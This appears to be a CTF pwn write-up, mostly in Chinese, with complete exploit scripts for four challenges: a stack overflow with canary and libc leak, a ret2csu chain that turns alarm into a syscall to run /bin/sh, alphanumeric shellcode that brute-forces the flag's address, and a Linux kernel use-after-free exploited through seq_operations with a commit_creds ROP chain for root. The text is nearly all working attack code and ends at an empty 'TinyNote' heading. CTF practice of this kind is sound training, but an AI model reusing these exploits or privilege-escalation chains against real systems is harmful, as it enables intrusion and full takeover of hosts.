string_go

简单栈溢出

from pwn import*
#r=remote("82.157.20.104",29800)
r=process('./main')
context.log_level='debug'

libc=ELF("./libc-2.27.so")

def write(content):
	r.recvuntil(">>> ")
	r.sendline(content)

write("1+(1+1)")
write("-1+1")

sleep(0.1)

r.recvuntil(">>> ")
write("2+2")

r.recv(0xd8)
canary=u64(r.recv(8))
r.recv(0x18)
libc_base=u64(r.recv(8))-libc.sym['__libc_start_main']-0xe7
success("libc_base: "+hex(libc_base))
success("canary: "+hex(canary))

one_gadget=libc_base+0x4f3d5

r.recv()
r.recv()

r.sendline("1+2")
r.sendline("1+1")

r.sendline("a"*0x19+p64(canary)+p64(0)*3+p64(one_gadget))

r.interactive()

blind

参考文章：

将close修改为syscall并构造csu

需要爆破0xFF个字节确定syscall位置

from pwn import*
r=remote("82.157.6.165",30400)
#r=process('./main')
context.log_level='debug'

elf=ELF("./main")

csu1=0x4007BA
csu2=0x4007A0
read_got=elf.got['read']
alarm_got=elf.got['alarm']
sleep_got=elf.got['sleep']
main=0x4005C0

payload='a'*0x58
payload+=p64(csu1)
payload+=p64(0)+p64(1)
payload+=p64(read_got)
payload+=p64(1)
payload+=p64(alarm_got)
payload+=p64(0)
payload+=p64(csu2)
payload+=p64(0)

payload+=p64(0)+p64(1)
payload+=p64(read_got)
payload+=p64(0x8)
payload+=p64(sleep_got+0x100)
payload+=p64(0)
payload+=p64(csu2)
payload+=p64(0)

payload+=p64(0)+p64(1)
payload+=p64(read_got)
payload+=p64(0x3b)
payload+=p64(sleep_got+0x150)
payload+=p64(0)
payload+=p64(csu2)
payload+=p64(0)

payload+=p64(0)+p64(1)
payload+=p64(alarm_got)
payload+=p64(0)
payload+=p64(0)
payload+=p64(sleep_got+0x100)
payload+=p64(csu2)

#gdb.attach(r)
r.send(payload.ljust(0x500,'\x00'))

r.send('\x38')

r.send("/bin/sh\x00")

r.send("\x00"*0x3b)

r.interactive()

code_project

出题人没有ban掉writev的syscall

构造writev并检测返回值，爆破flag可能存在的内存地址

from pwn import*
from ae64 import AE64
r=remote("82.157.31.181",23000)
#r=process('./main')
context(os='linux',arch='amd64',log_level='info')

r.recvline()
r.recvline()

shell=b""
shell+=asm("add r14,0x11")
shell+=asm("push 0x1000000")
shell+=asm("pop rbx")
shell+=asm("push 0x14")
shell+=asm("pop rax")
shell+=asm("push 0x1")
shell+=asm("pop rdi")
shell+=asm("push 0x1")
shell+=asm("pop rdx")
shell+=asm("push 0x30")
shell+=asm("push rbx")
shell+=asm("mov rsi,rsp")
shell+=asm("syscall")
shell+=asm("cmp rax,0x30")
shell+=asm("add rbx,0x1000")
shell+=asm("jmp r14")
shell+=asm("hlt")

shell=AE64().encode(shell,"rdx",0,"small")

#gdb.attach(r,"b *0x400B16")
r.send(shell)

r.interactive()

easykernel

kmalloc-32以下的uaf

未开启smap，使用seq_operation泄露以及控制RIP流

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
#include <syscall.h>
#include <pthread.h>
#include <linux/fs.h>
#include <sys/shm.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>

#define PAGE_SIZE 0x1000

int dev_fd;
uint64_t user_cs,user_ss,user_eflag,rsp;

void save_state()
{
	asm(
		"movq %%cs, %0;"
		"movq %%ss, %1;"
		"movq %%rsp, %3;"
		"pushfq;"
		"pop %2;"
		: "=r"(user_cs),"=r"(user_ss),"=r"(user_eflag),"=r"(rsp)
		:
		: "memory"
	);
}

void error(char *err)
{
	puts(err);
	exit(0);
}

uint64_t new(uint64_t size,char *content)
{
	uint64_t arg[3]={size,(uint64_t)content};
	uint64_t result=ioctl(dev_fd,0x20,&arg);
	return result;
}

uint64_t delete(uint64_t idx)
{
	uint64_t arg[1]={idx};
	uint64_t result=ioctl(dev_fd,0x30,&arg);
	return result;
}

uint64_t show(uint64_t idx,uint64_t size,char *recv_content)
{
	uint64_t arg[3]={idx,size,(uint64_t)recv_content};
	uint64_t result=ioctl(dev_fd,0x40,&arg);
	return result;
}

uint64_t edit(uint64_t idx,uint64_t size,char *content)
{
	uint64_t arg[3]={idx,size,(uint64_t)content};
	uint64_t result=ioctl(dev_fd,0x50,&arg);
	return result;
}

int seq_open()
{
	int seq;
	if ((seq=open("/proc/self/stat", O_RDONLY))==-1)
	{
		puts("[X] seq Error");
		exit(0);
	}
	return seq;
}

void get_shell()
{
	system("/bin/sh");
}

int main()
{
	save_state();
	dev_fd=open("/dev/kerpwn",O_RDWR);
	if (dev_fd<0)
	{
		puts("[X] Device Open Error");
		exit(0);
	}
	uint64_t *buf=malloc(0x20); uint64_t *recv_buf=malloc(0x20);

	new(0x20,(char *)buf);
	delete(0);
	int seq;
	for (int i=0; i<0x10; i++)
	{
		seq=seq_open();
		memset(recv_buf,0,sizeof(recv_buf));
		show(0,0x20,(char *)recv_buf);
		if (recv_buf[0]&&recv_buf[1]&&recv_buf[2]&&recv_buf[3]) break;
	}
	uint64_t kernel_base=recv_buf[0]-0x319D30;
	uint64_t prepare_kernel_cred=kernel_base+0xc91d0;
	uint64_t commit_creds=kernel_base+0xc8d40;
	uint64_t kpti_trampoline=kernel_base+0xc00f30;
	uint64_t gadget=kernel_base+0xe3b22;
	uint64_t pop_rdi=kernel_base+0x89250;
	uint64_t mov_rdi_rax=kernel_base+0xb72e8b;
	uint64_t swapgs_ret=kernel_base+0x75ef0;
	uint64_t iretq=kernel_base+0x3a2ab;

	printf("[+] kernel_base: 0x%lx\n",kernel_base);
	printf("[+] prepare_kernel_cred: 0x%lx\n",prepare_kernel_cred);
	printf("[+] commit_creds: 0x%lx\n",commit_creds);

	uint64_t *mmap_addr=mmap((void *)(gadget&0xFFFFF000),PAGE_SIZE,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANONYMOUS|MAP_SHARED,-1,0);
	printf("[+] mmap_addr: 0x%lx\n",(uint64_t)mmap_addr);

	uint64_t *ROP=(uint64_t *)(((char *)mmap_addr)+0xb22),i=0;
	*(ROP+i++)=pop_rdi;
	*(ROP+i++)=0;
	*(ROP+i++)=prepare_kernel_cred;
	*(ROP+i++)=mov_rdi_rax;
	*(ROP+i++)=commit_creds;
	*(ROP+i++)=kpti_trampoline+22;
	*(ROP+i++)=0;
	*(ROP+i++)=0;
	*(ROP+i++)=(uint64_t)get_shell;
	*(ROP+i++)=user_cs;
	*(ROP+i++)=user_eflag;
	*(ROP+i++)=rsp;
	*(ROP+i++)=user_ss;

	buf[0]=(uint64_t)gadget;
	edit(0,0x20,(char *)buf);
	read(seq,NULL,0);
}

TinyNote